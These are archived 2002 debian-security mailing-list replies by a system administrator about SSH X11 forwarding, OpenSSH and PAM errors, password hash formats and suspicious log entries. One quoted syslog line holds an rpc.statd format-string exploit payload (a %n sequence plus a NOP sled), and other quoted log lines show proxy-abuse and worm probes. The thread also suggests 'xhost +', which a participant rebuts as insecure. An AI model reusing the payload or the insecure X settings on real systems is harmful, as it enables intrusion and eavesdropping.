This one time, Norbert Preining wrote: > > It doesn't matter about the sshd_config, only the ssh_config on the > I DEFINITELY matter what is in the sshd_config on the server. The server > make the primary dictate on what is allowed and what is forbidden. Well, yeah.. but you said to check the ssh_config on the client and the server... not just the server. Anyway, let me know if you have any ideas. -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpK6dYbgSgTe.pgp Description: PGP signature
Re: More SSH Fun (X11 forwarding)
Clarifying myself.. sorry :) So, if I force X11 with the -X (even though my ssh_config on the client is set to X11Forwarding yes), I get the same as if I don't run ssh with the -X option. -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpzWjFUI11GE.pgp Description: PGP signature
Re: More SSH Fun (X11 forwarding)
Hi David, Nope, that didn't help. It may be because X11 isn't listening on port 6000, but I really didn't think that would affect X11 forwarding. Guess it does. I'll try and set my X11 to listen, and if that fixes it, it goes in the FAQ :) -Anne This one time, David Caplan wrote: > Hi, I'm not exactly sure what you are trying to do, maybe this will > help :) > does it matter if you authorize the other computer with xhost? > or just a `xhost +` ? > >- David > > > > > > So, if I force X11 with the -X (even though my ssh_config on > > the client is set to X11Forwarding yes), I get the same as if > > I don't run ssh with the -X option. > > > > -Anne > > > -+- > // <[EMAIL PROTECTED]> // <http://david.ath.cx> > gpg fingerprint:: A439 6991 01CD 18F8 BF17 4E3E 7197 B014 014D 64C1 > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpt3Usyi4RBt.pgp Description: PGP signature
Re: More SSH Fun (X11 forwarding)
Okay, having X11 listening for TCP connections with xhost + enabled didn't help. I'm open to other suggestions. :) -Anne This one time, Anne Carasik wrote: > Hi David, > > Nope, that didn't help. It may be because X11 isn't listening on > port 6000, but I really didn't think that would affect X11 forwarding. > > Guess it does. I'll try and set my X11 to listen, and if that fixes > it, it goes in the FAQ :) > > -Anne > > This one time, David Caplan wrote: > > Hi, I'm not exactly sure what you are trying to do, maybe this will > > help :) > > does it matter if you authorize the other computer with xhost? > > or just a `xhost +` ? > > > >- David > > > > > > > > > > So, if I force X11 with the -X (even though my ssh_config on > > > the client is set to X11Forwarding yes), I get the same as if > > > I don't run ssh with the -X option. > > > > > > -Anne > > > > > > -+- > > // <[EMAIL PROTECTED]> // <http://david.ath.cx> > > gpg fingerprint:: A439 6991 01CD 18F8 BF17 4E3E 7197 B014 014D 64C1 > > > > > > > > -- > > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > > > > -- > .-"".__."``". Anne Carasik, System Administrator > .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu > (O/ O) \-' ` -="""=.', Center for Advanced Computing Research > ~`~~ > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpGVfFoqpBxc.pgp Description: PGP signature
Re: More SSH Fun (X11 forwarding)
Hi Vineet, It doesn't matter--it's still does not work no matter what I do to my X server. Anyway, I turned off xhost and X11 listening a while ago. -Anne This one time, Vineet Kumar wrote: > * Anne Carasik ([EMAIL PROTECTED]) [020701 16:01]: > > This one time, David Caplan wrote: > > > Hi, I'm not exactly sure what you are trying to do, maybe this will > > > help :) > > > does it matter if you authorize the other computer with xhost? > > > or just a `xhost +` ? > > > > Nope, that didn't help. It may be because X11 isn't listening on > > port 6000, but I really didn't think that would affect X11 forwarding. > > > > Guess it does. I'll try and set my X11 to listen, and if that fixes > > it, it goes in the FAQ :) > > nonono! don't set your x server to listen for tcp and don't use xhost. > > That is the Wrong Way. The whole idea of using ssh's x forwarding is to > avoid sending your X session (including all your keystrokes) across the > wire in the clear. (It's also rather convenient, once it's set up right, > to locally-display remote apps, but demonstrated difficulties in getting > it set up negate any convenience argument in this case, I think!) > > For review: > > http://www.google.com/search?q=never+xhost&btnI=I > > good times, > Vineet > -- > http://www.doorstop.net/ > -- > "Computer Science is no more about computers > than astronomy is about telescopes." -E.W. Dijkstra -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpwNFunb0s7p.pgp Description: PGP signature
Re: More SSH Fun (X11 forwarding)
Hi Vineet, I appreciate the help, but I know that setting the DISPLAY doesn't work either. I need to know what DOES work, or if this is a bug. How did you get X11 working on Debian running OpenSSH 3.4p1? Did it just magically work for you? Did you have to set something? -Anne This one time, Vineet Kumar wrote: > No, that's not right, either. If you have DISPLAY set in the environment > of the ssh client when it connects, and the remote sshd and local ssh > are instructed to allow it, ssh forwarding takes place. It gets set up > by creating a virtual X server on the remote machine and setting DISPLAY > there to that (something like remote:10.0). X clients run remotely > connect to that virtual X server, which simply acts as a sort of proxy > to send the X data through the ssh tunnel to the X server on the local > machine. > > So DISPLAY won't be set to the local ssh client machine. If it is, the X > clients will be sending their data straight to the local client over the > network, in the clear! (If the local X server is set to listen for it, > which it shouldn't be, and isn't by default on recent debian systems.) > > Once it's working, you shouldn't have to touch DISPLAY. (Except possibly > to make sure it's set to the right thing on the LOCAL side, before the > connection is ever attempted. That should only happen if your > environment is whacked for some other reason, though.) > > good times, > Vineet > -- > http://www.doorstop.net/ > -- > "Computer Science is no more about computers > than astronomy is about telescopes." -E.W. Dijkstra -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpuqlG8IjIFT.pgp Description: PGP signature
Re: error msg
Looks like someone's checking your system for a buffer overflow exploit. -Anne This one time, Liu, GuangYu wrote: > Hi there, > Anybody knows what caused the following error message: > > Jul 30 13:16:35 liugy rpc.statd[298]: gethostbyname error for > ^X???^X???^Y???^Y???^Z???^Z???^[???^[???%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%1 > 37x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 > 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 > 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 > 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 > 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 > 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 > 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 > 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 > 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 > 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 > 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 > 20\220\220\220\2 > 20\220\220\220\220\220\220\220\220\220 > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgp2bqaaNbWnm.pgp Description: PGP signature
Re: Telnet information.
Here's the link to the Phrack article. http://www.phrack.org/show.php?p=59&a=11 It's a really good read, and what they are suggesting would affect the entire implementation of SSH, not just OpenSSH or SSH.com. It can't be fixed from the config file, as they are not talking about the protocols 1 or 2. -Anne This one time, Dale Amon wrote: > On Wed, Jul 31, 2002 at 01:58:59PM +0200, Robert van der Meulen wrote: > > > > Quoting Jay Kline ([EMAIL PROTECTED]): > > > I maay be wrong, but dont the SSH clients need that banner to be able to > > > identify what version to use? > > > > Yes; the major/minor combination tells the client which protocol versions > > can be used. The latest phrack has some interesting information about that > > as well :) > > But you can use the sshd_config and ssh_config to allow only the version > you want. > > > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgp7xg3aJEZIw.pgp Description: PGP signature
Re: CERT advisories
This one time, S?ren Hansen wrote: > The most recent CERT advisory is about a vulnerability in OpenSSL. At > the end of the advisory there's a link to RedHat who already has a patch > ready.. Does anyone know what it would take to let the Debian community > in the loop? I suppose this might let information out in the open before > it was intended, but it doesn't seem fair that Debian should lag behind > because we're an open community, does it? > > Or am I missing something? You must be missing something. $ openssl version OpenSSL 0.9.6e 30 Jul 2002 $ uname -a Linux swamp 2.4.17 #1 Fri Feb 22 11:08:36 PST 2002 i686 unknown unknown GNU/Linux I'm running Woody on my boxes. -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpUbMpXAFh1W.pgp Description: PGP signature
Re: Telnet information.
Hi there, This one time, Dale Amon wrote: > Perhaps, but one should always change > > Protocol 1,2 > > to just > > Protocol 2 > > in both ssh_config and sshd_config. If someone > only speaks P1, you really don't want to talk > to them at all. There's no debating that. The article doesn't refer to that--it refers to basic functionality of Secure Shell. -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgp8KRZfv8ond.pgp Description: PGP signature
Re: encrypting/decrypting partitions on the fly?
Also, look for bestcrypt. It's at www.jetico.com. -Anne This one time, [EMAIL PROTECTED] wrote: > > Hello! > Anybody know of a tool like PGPDisk for Linux? > > Cya Arnd > > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpIamKQzp5tT.pgp Description: PGP signature
Re: Pgp/GPG MiM chosen ciphertext attack
You mean, the social engineering that they were so nice to point out? *sigh* No cure for stupid users. -Anne This one time, Dale Amon wrote: > I presume most of you have heard about the paper > by Jallad, Katz and Schneier? > > http://www.counterpane.com/pgp-attack.html > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpmj9hXGhZBQ.pgp Description: PGP signature
Re: Converting Users from Solaris to (Debian-)Linux
This one time, Vincent Hanquez wrote: > > /etc/shadow on Linux: > > test:$1$mT.fKI5L$Fgq6C.AKbkzGfCU.RDDqj.:11929:0:9:7:-1:-1:134549020 > > > > /etc/shadow on Solaris: > > test:TCs9gC4bJy8rg:11929:: > > > > the hashes are quite different .. ;( > > you use MD5 password on your linuxbox. > you should downgrade your crypt to normal hash password Isn't this a security list? :) Why would anyone downgrade a hash? All my hashes are MD5 based, and I haven't had a problem copying password hashes out of Solaris. -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpw43bC0tWhg.pgp Description: PGP signature
Re: Converting Users from Solaris to (Debian-)Linux
This one time, Jan-Hendrik Palic wrote: > On Fri, Aug 30, 2002 at 12:04:15PM -0400, Steve Mickeler wrote: > >Your solaris hashes arent MD5. > is it not possible to upgrade to MD5 on Solaris? Would PAM for that? I'm not sure if I made my Debian box with MD5 then.. *sigh* -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpzTxxaDNTCC.pgp Description: PGP signature
Re: "suspicious" apache log entries
Sounds like Code Red. We get a lot of these too, and the Microsoft attacks don't do much to an Apache server :) -Anne This one time, Michael Renzmann wrote: > Hi all. > > While digging through the error.log of my apache I found two lines that > seem to hint toward a new (?) worm. I saw the first one some days ago, too: > > [Sat Aug 31 21:03:49 2002] [error] [client 64.152.12.2] request failed: > erroneous characters after protocol string: CONNECT > mailb.microsoft.com:25 / HTTP/1.0 > > Looks like there is someone trying to abuse a proxy to connect to a SMTP > server? > > > The second is a new one (which means I never saw it before). It appears > several times in the log, below I quoted the first appearance: > > [Sat Sep 7 05:33:20 2002] [error] [client 202.224.228.106] Client sent > malformed Host header > > Any idea what type of attack these lines give a hint about? I think > Apache is safe here, this most probably would be an attack against IIS > or something like that. But I would like to learn a little more about > those ones... > > Bye, Mike > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpUhoNg6mwDf.pgp Description: PGP signature
Re: Probem with openssh and pam modules
Kill your sshd. Run it in debugging mode (it will not fork a process): # sshd -ddd Open another window, now run the client in verbose mode: $ ssh -vvv [EMAIL PROTECTED] Then email us the output. :) Otherwise, this is really difficult to troubleshoot. -Anne This one time, Alexis Sukrieh wrote: > You're right, it was set to yes but after putting it to 'no', the same > problem is still there... > > At 16:11 02/10/2002 +0200, you wrote: > >You need to turn off UsePrivilegeSeparation > >in your /etc/ssh/sshd_config file. > > > >"UsePrivilegeSeparation no" > > > > > Alexis Sukrieh (sukria), <[EMAIL PROTECTED]> > . homepage - [http://sukria.net] > . clef PGP - [http://sukria.net/print.php?c=privacy] > . mydynaweb - [http://www.mydynaweb.net] > __ > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpxSFgB98CbJ.pgp Description: PGP signature
Re: Probem with openssh and pam modules
> debug2: input_userauth_request: try method password > debug1: PAM Password authentication accepted for user "sukria" > debug2: pam_acct_mgmt() = 0 > Accepted password for sukria from 127.0.0.1 port 32989 ssh2 > debug1: Entering interactive session for SSH2. > debug1: fd 3 setting O_NONBLOCK > debug1: fd 8 setting O_NONBLOCK > debug1: server_init_dispatch_20 > debug1: server_input_channel_open: ctype session rchan 0 win 65536 max 16384 > debug1: input_session_request > debug1: channel 0: new [server-session] > debug1: session_new: init > debug1: session_new: session 0 > debug1: session_open: channel 0 > debug1: session_open: session 0: link with channel 0 > debug1: server_input_channel_open: confirm session > debug1: server_input_channel_req: channel 0 request pty-req reply 0 > debug1: session_by_channel: session 0 channel 0 > debug1: session_input_channel_req: session 0 req pty-req > debug1: Allocating pty. > debug1: session_pty_req: session 0 alloc /dev/pts/3 > debug3: tty_parse_modes: SSH2 n_bytes 256 > debug3: tty_parse_modes: ospeed 9600 > debug3: tty_parse_modes: ispeed 9600 > debug3: tty_parse_modes: 1 3 > debug3: tty_parse_modes: 2 28 > debug3: tty_parse_modes: 3 127 > debug3: tty_parse_modes: 4 21 > debug3: tty_parse_modes: 5 4 > debug3: tty_parse_modes: 6 0 > debug3: tty_parse_modes: 7 0 > debug3: tty_parse_modes: 8 17 > debug3: tty_parse_modes: 9 19 > debug3: tty_parse_modes: 10 26 > debug3: tty_parse_modes: 12 18 > debug3: tty_parse_modes: 13 23 > debug3: tty_parse_modes: 14 22 > debug3: tty_parse_modes: 18 15 > debug3: tty_parse_modes: 30 0 > debug3: tty_parse_modes: 31 0 > debug3: tty_parse_modes: 32 0 > debug3: tty_parse_modes: 33 0 > debug3: tty_parse_modes: 34 0 > debug3: tty_parse_modes: 35 0 > debug3: tty_parse_modes: 36 1 > debug3: tty_parse_modes: 37 0 > debug3: tty_parse_modes: 38 1 > debug3: tty_parse_modes: 39 0 > debug3: tty_parse_modes: 40 0 > debug3: tty_parse_modes: 41 0 > debug3: tty_parse_modes: 50 1 > debug3: tty_parse_modes: 51 1 > debug3: tty_parse_modes: 52 0 > debug3: tty_parse_modes: 53 1 > debug3: tty_parse_modes: 54 1 > debug3: tty_parse_modes: 55 1 > debug3: tty_parse_modes: 56 0 > debug3: tty_parse_modes: 57 0 > debug3: tty_parse_modes: 58 0 > debug3: tty_parse_modes: 59 1 > debug3: tty_parse_modes: 60 1 > debug3: tty_parse_modes: 61 1 > debug3: tty_parse_modes: 62 0 > debug3: tty_parse_modes: 70 1 > debug3: tty_parse_modes: 71 0 > debug3: tty_parse_modes: 72 1 > debug3: tty_parse_modes: 73 0 > debug3: tty_parse_modes: 74 0 > debug3: tty_parse_modes: 75 0 > debug3: tty_parse_modes: 90 1 > debug3: tty_parse_modes: 91 1 > debug3: tty_parse_modes: 92 0 > debug3: tty_parse_modes: 93 0 > debug1: server_input_channel_req: channel 0 request shell reply 0 > debug1: session_by_channel: session 0 channel 0 > debug1: session_input_channel_req: session 0 req shell > debug1: PAM setting tty to "/dev/pts/3" > PAM session setup failed[28]: Module is unknown > debug1: Calling cleanup 0x805a3ec(0x80917a0) > debug1: session_pty_cleanup: session 0 release /dev/pts/3 > debug1: Calling cleanup 0x80604b8(0x0) > debug1: channel_free: channel 0: server-session, nchannels 1 > debug3: channel_free: status: The following connections are open: > #0 server-session (t10 r0 i0/0 o0/0 fd -1/-1) > > debug3: channel_close_fds: channel 0: r -1 w -1 e -1 > debug1: Calling cleanup 0x8052b48(0x0) > debug1: Calling cleanup 0x806be4c(0x0) > poseidon:~# > > > At 07:22 02/10/2002 -0700, Anne Carasik wrote: > >Kill your sshd. Run it in debugging mode (it will not > >fork a process): > > > ># sshd -ddd > > > >Open another window, now run the client in verbose mode: > > > >$ ssh -vvv [EMAIL PROTECTED] > > > >Then email us the output. :) Otherwise, this is really difficult > >to troubleshoot. > > > >-Anne > > > > > > > >This one time, Alexis Sukrieh wrote: > >> You're right, it was set to yes but after putting it to 'no', the same > >> problem is still there... > >> > >> At 16:11 02/10/2002 +0200, you wrote: > >> >You need to turn off UsePrivilegeSeparation > >> >in your /etc/ssh/sshd_config file. > >> > > >> >"UsePrivilegeSeparation no" > >> > >> > >> > >> > >> Alexis Sukrieh (sukria), <[EMAIL PROTECTED]> > >> . homepage - [http://sukria.net] > >> . clef PGP - [http://sukria.net/print.php?c=privacy] > >> . mydynaweb - [http://www.mydynaweb.net] > >> __ > >> > >> > >> -- > &
Re: Probem with openssh and pam modules
Hi Alexis, Did you setup /etc/pam.d/ssh? -Anne This one time, Alexis Sukrieh wrote: > Hehe :) > > yes, but before mailing here, I've supposed that there was a missing > packagedependance in unstable and I look for pam* stuff. > > I found those ones > > libpam-modules - Pluggable Authentication Modules for PAM > libpam0g - Pluggable Authentication Modules library > > and I installed it. > > I also installed > libpam-cracklib - PAM module to enable cracklib support. > > but nothing changed... > > I really don't see what to do ... > > At 07:41 02/10/2002 -0700, you wrote: > >Hi there, > > > >This might provide a clue: > > debug1: PAM setting tty to "/dev/pts/3" > > PAM session setup failed[28]: Module is unknown > > > >-Anne > > > > > Alexis Sukrieh (sukria), <[EMAIL PROTECTED]> > . homepage - [http://sukria.net] > . clef PGP - [http://sukria.net/print.php?c=privacy] > . mydynaweb - [http://www.mydynaweb.net] > __ > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpuzSWlIe8T2.pgp Description: PGP signature
Re: Probem with openssh and pam modules
This one time, Alexis Sukrieh wrote: > Well, again it is not the solution for me ! > It is yet turned off Hmmm.. not sure. > is this a common problem ??? I'm surprised in the way that every > intelligent solutions you all provide to me are ineffectvie... Hmmm.. try apt-get remove --purge openssh and reinstall it after you get PAM working. > is the ssh package young in the unstable branch ? I haven't had any problems, but it is unstable after all ;) -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpzjfpgSqM8d.pgp Description: PGP signature
Re: Probem with openssh and pam modules
This one time, Lupe Christoph wrote: > Correct me if I'm wrong, but don't we expect people who run unstable to > diagnoseproblems themselves? If they can't they should be running stable > or at least testing? I think there's nothing wrong with helping someone out, no matter which group they're running. Why should it matter? Isn't this mailing list called debian-security? Not debian-security-stable. > Unstable is not just a name... Neither is testing nor stable :) -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpNQKHtRQo5U.pgp Description: PGP signature
